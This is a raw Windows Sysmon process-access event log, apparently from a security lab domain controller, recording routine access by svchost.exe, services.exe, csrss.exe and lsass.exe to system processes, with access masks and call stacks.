15:51:00.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000861Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000860Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000859Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000858Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.753{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000857Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.738{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000856Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.738{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000855Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.722{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000854Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.722{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000853Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.722{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000852Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.722{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000851Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.722{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000850Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.722{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000849Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.722{D28789B6-7C62-5FA1-0A00-000000008801}8521132C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-1600-000000008801}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000848Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.722{D28789B6-7C62-5FA1-0A00-000000008801}8521188C:\Windows\system32\services.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000847Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.722{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1600-000000008801}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000846Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.722{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C64-5FA1-1600-000000008801}1544C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000845Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.722{D28789B6-7C62-5FA1-0A00-000000008801}852948C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-1600-000000008801}1544C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000844Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.722{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000843Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.722{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000842Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.722{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000841Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.722{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000840Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.722{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000839Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.722{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000838Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.691{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000837Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 